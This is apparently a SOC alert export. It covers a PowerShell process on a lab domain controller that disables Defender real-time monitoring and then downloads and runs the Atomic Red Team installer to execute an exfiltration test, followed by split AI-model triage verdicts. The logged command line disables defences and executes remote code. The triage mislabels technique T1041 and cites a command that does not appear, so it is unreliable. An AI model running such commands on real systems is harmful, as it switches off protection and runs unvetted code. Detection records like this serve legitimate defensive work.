{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 7784",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1041 -CheckPrereqs ; Invoke-AtomicTest T1041 -GetPrereqs ; Invoke-AtomicTest T1041 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 152584192,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld50FC.tmp.bat T1041 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4558848,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 7784,
        "THIS_ATOM": "c1d5d0ed21717873736d54e669c2a82e",
        "THREADS": 3,
        "TIMESTAMP": 1774364718110,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 7784,
      "PROCESS_ID": 7948,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "d428e7b6-53db-4782-aa6b-e435e59ef988",
      "event_time": 1774364719190,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 4357,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c1d5d0ed21717873736d54e669c2a82e",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "a7a9b78146a0cc20ecb9bae069c2a832"
    }
  },
  "detect_id": "07017830-eb70-46b5-bad7-87c269c2a833",
  "gen_time": 1774364723548,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364719\u0026selected=a7a9b78146a0cc20ecb9bae069c2a832",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "d428e7b6-53db-4782-aa6b-e435e59ef988",
    "event_time": 1774364719190,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 4357,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c1d5d0ed21717873736d54e669c2a82e",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "a7a9b78146a0cc20ecb9bae069c2a832"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364723000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.875,
  "false_positive_reason": null,
  "investigation_questions": [
    "How did the attacker gain SYSTEM privileges?",
    "What other processes were running before this event?",
    "Are there any persistence mechanisms established?",
    "Has this host been part of a broader compromise?"
  ],
  "ioc_analysis": "The process is running as NT AUTHORITY\\SYSTEM, which indicates privilege escalation or compromise of system-level access. The command line contains malicious indicators including disabling real-time monitoring (Set-MpPreference), executing Invoke-ExternalScript via IEX, and downloading from a GitHub repository associated with offensive security testing. While the file path appears legitimate (System32) and the binary is signed, the behavior is clearly malicious due to the specific commands executed.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1041 - Remote Services"
    }
  ],
  "mitre_techniques": [
    "T1041",
    "T1567.002",
    "T1567.003",
    "T1059"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to GitHub and known malicious domains",
    "Investigate user activity and access logs for SYSTEM account usage",
    "Run full malware scan on the system",
    "Preserve memory dump for forensic analysis"
  ],
  "risk_score": 85,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell scripts designed to disable real-time monitoring and deploy the Atomic Red Team framework. The command line explicitly disables Microsoft Defender\u0027s real-time protection and downloads code from an external GitHub repository known for offensive security testing tools.\n\n**IOC Analysis:** The process is running as NT AUTHORITY\\SYSTEM, which indicates privilege escalation or compromise of system-level access. The command line contains malicious indicators including disabling real-time monitoring (Set-MpPreference), executing Invoke-ExternalScript via IEX, and downloading from a GitHub repository associated with offensive security testing. While the file path appears legitimate (System32) and the binary is signed, the behavior is clearly malicious due to the specific commands executed.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nThe detection involves a legitimate PowerShell process in System32 executing commands to disable real-time monitoring and install attack tools, indicating a potential evasion attempt. The command line shows malicious intent, such as downloading and installing Atomic Red Team scripts, which could be used for unauthorized access or system compromise.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Windows system binary located in C:\\Windows\\System32, which is expected and typically benign. However, the command line includes actions to disable real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring $true) and install potentially malicious tools (Install-AtomicRedTeam), suggesting malicious intent despite the process being legitimate. The hash is Microsoft-signed, but the context of the commands raises suspicion.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 80% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.8,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}